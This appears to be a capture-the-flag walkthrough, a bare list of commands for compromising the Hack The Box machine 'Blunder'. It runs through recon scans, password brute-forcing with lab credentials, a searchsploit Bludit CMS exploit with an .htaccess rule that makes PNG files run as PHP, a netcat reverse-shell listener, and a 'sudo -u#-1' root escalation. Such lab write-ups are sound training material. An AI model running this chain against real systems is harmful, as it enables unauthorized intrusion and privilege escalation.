
Blunder
HTB Linux
nmap -A -p- -oA output 10.129.95.225 —min-rate=10000 —script=vuln —script-timeout=15 -v
nmap -sC -sV -O -p- -oA blunder 10.129.95.225
nmap -sU -O -p- -oA blunder-udp 10.129.95.225
nikto -h 10.129.95.225:80
whatweb http://10.129.95.225
searchsploit bludit
wfuzz -c -t 400 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.95.225/FUZZ
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u “http://10.129.95.225/FUZZ” -e .txt -t 30
cewl -w dictionary.txt http://10.129.95.225
python3 bruteforcer.py
Credenciales-> fergus:RolandDeschain
http://10.129.95.225/admin/dashboard
cat bruteforcer.py
searchsploit -m 48701
cat bludit_exploit.py
cat evil.png)
echo “RewriteEngine off” > .htaccess
echo “Addtype application/x-httpd-php .png” >> .htaccess
python3 bludit exploit.py
http://10.129.95.225/bl-content/tmp/temp/
nc -lvnp 443
Credenciales-> hugo:Password120
su hugo
sudo -l
sudo -u#-1 /bin/bash